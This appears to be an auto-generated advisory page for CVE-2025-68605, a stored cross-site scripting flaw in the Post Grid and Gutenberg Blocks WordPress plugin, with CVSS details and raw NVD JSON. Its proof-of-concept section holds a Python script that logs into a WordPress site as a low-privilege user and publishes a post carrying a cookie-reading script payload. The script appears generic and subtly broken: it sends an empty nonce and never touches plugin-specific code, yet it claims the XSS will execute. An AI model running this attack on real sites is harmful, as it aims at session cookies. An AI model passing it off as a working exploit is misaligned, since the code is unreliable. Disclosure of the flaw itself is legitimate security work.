Security Vulnerability Report
中文
CVE-2025-68605 CVSS 6.5 MEDIUM

CVE-2025-68605

Published: 2025-12-24 13:16:28
Last Modified: 2026-04-27 19:16:36
Source: [email protected]

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PickPlugins Post Grid and Gutenberg Blocks post-grid allows Stored XSS.This issue affects Post Grid and Gutenberg Blocks: from n/a through <= 2.3.23.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

PickPlugins Post Grid and Gutenberg Blocks <= 2.3.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68605 PoC - Stored XSS in Post Grid and Gutenberg Blocks # Target: PickPlugins Post Grid and Gutenberg Blocks <= 2.3.23 import requests import sys target_url = "http://target-wordpress-site.com" username = "attacker" password = "attacker_password" # XSS payload xss_payload = "<script>alert(document.cookie)</script>" def exploit_stored_xss(): """ This PoC demonstrates how an attacker with low privileges (e.g., subscriber) can inject malicious JavaScript through post content that gets stored and executed when displayed by the Post Grid plugin. """ session = requests.Session() # Step 1: Login as low-privilege user login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/" } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies: print("[-] Login failed") return False print("[+] Login successful") # Step 2: Create a post with XSS payload post_url = f"{target_url}/wp-admin/post-new.php" post_data = { 'post_title': 'XSS Test Post', 'post_content': f"""<div class="post-grid-item"> <h3>{xss_payload}</h3> <p>Test content</p> </div>""", 'post_status': 'publish', '_wpnonce': '', # Need to extract from page '_wp_http_referer': post_url } # In real attack, extract valid nonce from the page response = session.post(post_url, data=post_data) print("[+] Malicious post created") print(f"[+] Payload injected: {xss_payload}") print("[+] When admin views the post grid, XSS will execute") return True if __name__ == "__main__": print("CVE-2025-68605 Stored XSS PoC") print("=" * 50) exploit_stored_xss()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68605", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:28.060", "lastModified": "2026-04-27T19:16:36.287", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PickPlugins Post Grid and Gutenberg Blocks post-grid allows Stored XSS.This issue affects Post Grid and Gutenberg Blocks: from n/a through <= 2.3.23."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/post-grid/vulnerability/wordpress-post-grid-and-gutenberg-blocks-plugin-2-3-18-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.